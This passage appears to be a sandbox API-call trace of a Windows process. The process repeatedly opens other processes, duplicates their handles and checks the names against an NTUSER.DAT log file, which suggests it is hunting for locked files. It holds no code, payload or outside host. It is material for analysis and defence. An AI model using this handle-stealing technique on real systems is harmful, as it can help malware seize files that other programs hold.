bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.118] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.119] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.119] CloseHandle (hObject=0x670) returned 1 [0153.119] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.119] CloseHandle (hObject=0x680) returned 1 [0153.119] CloseHandle (hObject=0x62c) returned 1 [0153.119] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x62c [0153.119] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.119] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.120] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.120] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.121] CloseHandle (hObject=0x670) returned 1 [0153.121] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.121] CloseHandle (hObject=0x680) returned 1 [0153.121] CloseHandle (hObject=0x62c) returned 1 [0153.121] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x62c [0153.121] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.121] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.121] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.122] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.122] CloseHandle (hObject=0x670) returned 1 [0153.122] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.122] CloseHandle (hObject=0x680) returned 1 [0153.122] CloseHandle (hObject=0x62c) returned 1 [0153.122] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x62c [0153.122] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.122] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.123] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.124] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.124] CloseHandle (hObject=0x670) returned 1 [0153.124] _wcsicmp (_Str1="\\Google", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -7 [0153.124] CloseHandle (hObject=0x680) returned 1 [0153.124] CloseHandle (hObject=0x62c) returned 1 [0153.124] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x62c [0153.124] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.124] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.125] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.125] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.125] CloseHandle (hObject=0x670) returned 1 [0153.125] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.125] CloseHandle (hObject=0x680) returned 1 [0153.125] CloseHandle (hObject=0x62c) returned 1 [0153.126] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x62c [0153.126] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.126] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.127] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.127] CloseHandle (hObject=0x670) returned 1 [0153.127] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0153.127] CloseHandle (hObject=0x680) returned 1 [0153.127] CloseHandle (hObject=0x62c) returned 1 [0153.127] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x62c [0153.127] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.127] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.128] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.128] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.129] CloseHandle (hObject=0x670) returned 1 [0153.129] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.129] CloseHandle (hObject=0x680) returned 1 [0153.129] CloseHandle (hObject=0x62c) returned 1 [0153.129] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x62c [0153.129] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.129] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.129] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.130] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.130] CloseHandle (hObject=0x670) returned 1 [0153.130] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.130] CloseHandle (hObject=0x680) returned 1 [0153.130] CloseHandle (hObject=0x62c) returned 1 [0153.130] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x174) returned 0x62c [0153.130] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.130] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.131] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.132] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.132] CloseHandle (hObject=0x670) returned 1 [0153.132] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.132] CloseHandle (hObject=0x680) returned 1 [0153.132] CloseHandle (hObject=0x62c) returned 1 [0153.132] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x174) returned 0x62c [0153.132] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.132] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.133] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.133] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.133] CloseHandle (hObject=0x670) returned 1 [0153.134] _wcsicmp (_Str1="\\Java", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -4 [0153.134] CloseHandle (hObject=0x680) returned 1 [0153.134] CloseHandle (hObject=0x62c) returned 1 [0153.134] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e8) returned 0x62c [0153.134] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.134] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.134] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.135] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.135] CloseHandle (hObject=0x670) returned 1 [0153.135] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.135] CloseHandle (hObject=0x680) returned 1 [0153.135] CloseHandle (hObject=0x62c) returned 1 [0153.135] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e8) returned 0x62c [0153.135] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.135] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.136] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.137] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.137] CloseHandle (hObject=0x670) returned 1 [0153.137] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.137] CloseHandle (hObject=0x680) returned 1 [0153.137] CloseHandle (hObject=0x62c) returned 1 [0153.137] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7cc) returned 0x62c [0153.137] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.137] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.138] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.139] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.139] CloseHandle (hObject=0x670) returned 1 [0153.139] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.139] CloseHandle (hObject=0x680) returned 1 [0153.139] CloseHandle (hObject=0x62c) returned 1 [0153.139] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7cc) returned 0x62c [0153.139] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.139] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.139] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.140] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.140] CloseHandle (hObject=0x670) returned 1 [0153.140] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.140] CloseHandle (hObject=0x680) returned 1 [0153.140] CloseHandle (hObject=0x62c) returned 1 [0153.140] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c0) returned 0x62c [0153.140] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.140] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.141] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.142] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.142] CloseHandle (hObject=0x670) returned 1 [0153.142] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.142] CloseHandle (hObject=0x680) returned 1 [0153.142] CloseHandle (hObject=0x62c) returned 1 [0153.142] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c0) returned 0x62c [0153.142] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.143] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.143] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.143] CloseHandle (hObject=0x670) returned 1 [0153.143] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.144] CloseHandle (hObject=0x680) returned 1 [0153.144] CloseHandle (hObject=0x62c) returned 1 [0153.144] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x304) returned 0x62c [0153.144] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.144] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.145] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.145] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.145] CloseHandle (hObject=0x670) returned 1 [0153.145] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.145] CloseHandle (hObject=0x680) returned 1 [0153.145] CloseHandle (hObject=0x62c) returned 1 [0153.145] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x304) returned 0x62c [0153.146] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.146] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.146] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.147] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.147] CloseHandle (hObject=0x670) returned 1 [0153.147] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0153.147] CloseHandle (hObject=0x680) returned 1 [0153.147] CloseHandle (hObject=0x62c) returned 1 [0153.147] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3b4) returned 0x62c [0153.147] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.147] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.148] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.148] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.148] CloseHandle (hObject=0x670) returned 1 [0153.148] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.148] CloseHandle (hObject=0x680) returned 1 [0153.149] CloseHandle (hObject=0x62c) returned 1 [0153.149] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3b4) returned 0x62c [0153.149] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.149] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.150] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.150] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.150] CloseHandle (hObject=0x670) returned 1 [0153.150] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.150] CloseHandle (hObject=0x680) returned 1 [0153.150] CloseHandle (hObject=0x62c) returned 1 [0153.150] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x318) returned 0x62c [0153.150] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.150] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.151] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.152] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.152] CloseHandle (hObject=0x670) returned 1 [0153.152] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.152] CloseHandle (hObject=0x680) returned 1 [0153.152] CloseHandle (hObject=0x62c) returned 1 [0153.152] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x318) returned 0x62c [0153.152] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.152] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.153] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.153] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.154] CloseHandle (hObject=0x670) returned 1 [0153.154] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.154] CloseHandle (hObject=0x680) returned 1 [0153.154] CloseHandle (hObject=0x62c) returned 1 [0153.154] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6c0) returned 0x62c [0153.154] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.154] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.154] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.156] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.156] CloseHandle (hObject=0x670) returned 1 [0153.156] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.156] CloseHandle (hObject=0x680) returned 1 [0153.156] CloseHandle (hObject=0x62c) returned 1 [0153.156] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6c0) returned 0x62c [0153.156] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.156] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.156] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.157] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.157] CloseHandle (hObject=0x670) returned 1 [0153.157] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0153.157] CloseHandle (hObject=0x680) returned 1 [0153.157] CloseHandle (hObject=0x62c) returned 1 [0153.157] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x408) returned 0x62c [0153.157] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.158] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.159] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.159] CloseHandle (hObject=0x670) returned 1 [0153.159] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.159] CloseHandle (hObject=0x680) returned 1 [0153.159] CloseHandle (hObject=0x62c) returned 1 [0153.159] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x408) returned 0x62c [0153.159] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.159] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.160] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.160] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.160] CloseHandle (hObject=0x670) returned 1 [0153.160] _wcsicmp (_Str1="\\Windows Defender", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.160] CloseHandle (hObject=0x680) returned 1 [0153.161] 